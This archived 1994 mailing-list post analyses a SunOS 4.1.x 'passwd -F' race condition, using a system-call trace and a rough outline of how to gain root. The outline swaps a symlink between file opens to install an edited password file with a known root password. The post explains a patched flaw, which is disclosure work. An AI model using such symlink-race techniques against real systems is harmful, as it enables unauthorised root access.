Re: Sun Patch Id #102060-01

der Mouse (mouse@Collatz.McRCIM.McGill.EDU)
Mon, 19 Dec 1994 04:30:38 -0500

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Alain Durand: "Re: Sun Patch Id #102060-01"
Previous message: Mitch Wright: "Sun Patch Id #102060-01"
Maybe in reply to: Mitch Wright: "Sun Patch Id #102060-01"
Next in thread: Dave Horsfall: "Re: Sun Patch Id #102060-01"

> So does anybody know more about this one???  I've tried a few things,
> but haven't figured it out yet.  [...]

> Problem Description: 

>    1169007: Security: Root access possible on SunOS 4.1.x via forced passwd
>             race condition.

>    This patch restricts the use of the passwd command's -F option [...]

I just now did a simple experiment: I copied /etc/passwd to /tmp/gleep
and ran "passwd -F /tmp/gleep" under the control of trc.  Here's the
trace, edited to emphasize the relevant excerpts:

	open (0xf7fffa2e="/tmp/gleep", 0x0=O_RDONLY) = 3
[this is the first time /tmp/gleep appears in the trace]
	fstat (3, 0xf7fff704) = 0
	read (3, 0xc708, 8192) = 448: [the passwd file]
	close (3) = 0
	gethostname (0x9ae0, 64) = 0: [our hostname]
	ioctl (1, 0x40125401=TCGETA, 0xf7ffefe4) = 0: tio=[...]
	write (1, 0xf78028d0="Changing password for mouse on [hostname].\n", 58) = 58
	access (0xf77247d7="/etc/security/passwd.adjunct", 0x0=F_OK) = -1 ENOENT (No such file or directory)
[I don't know how this may interact with shadow passwords.]
	open (0xf7723ae5="/dev/tty", 0x0=O_RDONLY) = 3
	[catch SIGINT]
	[frob tty settings]
	[read new password]
	[do it all over again, for second copy of new password]
	[do a bunch of signal stuff: SIGHUP, SIGINT, SIGQUIT, SIGTSTP]
	umask (0000) = 0022
	open (0xcb80="/tmp/ptmp", 0xa01=O_WRONLY|O_CREAT|O_EXCL, 0644) = 3
[experimentation indicates the directory portion is taken from
/tmp/gleep's directory portion]
	getdtablesize () = 64
	setrlimit (0x0=RLIMIT_CPU, 0xf7fff878=cur=INFINITY max=INFINITY) = 0
	setrlimit (0x1=RLIMIT_FSIZE, 0xf7fff878=cur=INFINITY max=INFINITY) = 0
	open (0xf7fffa2e="/tmp/gleep", 0x0=O_RDONLY) = 4
	fstat (4, 0xf7fff7dc) = 0
	read (4, 0xcb98, 8192) = 448: [the passwd file]
	fstat (3, 0xf7fff058) = 0
	read (4, 0xcb98, 8192) = 0: 
	close (4) = 0
	write (3, 0xeba0=[the passwd file with modified entry], 448) = 448
	close (3) = 0
	rename (0xcb80="/tmp/ptmp", 0xf7fffa2e="/tmp/gleep") = 0

Thus, my idea of how one can exploit this is [note: this is not an
exploit script!] would be:
	% mkdir bar
	% cp /etc/passwd bar
	[edit bar/passwd to have a known root password]
	% ln -s /etc foo
	% passwd -F $cwd/foo/passwd
Now, you need to relink foo to point to bar, somewhere between the open
of $cwd/foo/ptmp and the open of $cwd/tmp/passwd, and then relink it
back before the rename() occurs.  If the passwd file is large, hitting
the second window may not be hard.

					der Mouse

			    mouse@collatz.mcrcim.mcgill.edu

Next message: Alain Durand: "Re: Sun Patch Id #102060-01"
Previous message: Mitch Wright: "Sun Patch Id #102060-01"
Maybe in reply to: Mitch Wright: "Sun Patch Id #102060-01"
Next in thread: Dave Horsfall: "Re: Sun Patch Id #102060-01"